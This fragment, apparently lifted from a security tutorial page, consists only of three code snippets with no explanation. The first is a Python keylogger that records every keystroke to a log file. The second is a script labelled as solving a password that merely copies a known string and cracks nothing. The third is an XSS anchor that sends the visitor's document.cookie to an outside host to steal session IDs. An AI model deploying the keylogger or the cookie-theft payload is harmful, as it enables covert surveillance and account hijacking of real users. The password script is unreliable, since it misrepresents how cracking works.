|  |
| --- |
| from pynput.keyboard import Key, Listener import logging logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s") def on\_press(key):  logging.info(str(key))  with Listener(on\_press=on\_press) as listener :  listener.join() |

|  |
| --- |
| import random  import time  password = ""  attempted\_password = ""  list\_of\_chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"  for letter in range(0,random.randint(100000, 250000)):  password += list\_of\_chars[random.randint(0, 61)]  def solve\_password(word):  global attempted\_password  for character in word:  for entry in list\_of\_chars:  if character == entry:  attempted\_password += character  continue  return attempted\_password  print("The password: {0:}\nLength of password was: {1:}\nIs correct?:{2:}".format(solve\_password(password),len(password), attempted\_password == password)) |

|  |
| --- |
| <a href=# onclick=\"document.location=\'http://techpanda.org/snatch\_sess\_id.php?c=\'+escape\(document.cookie\)\;\"></a> |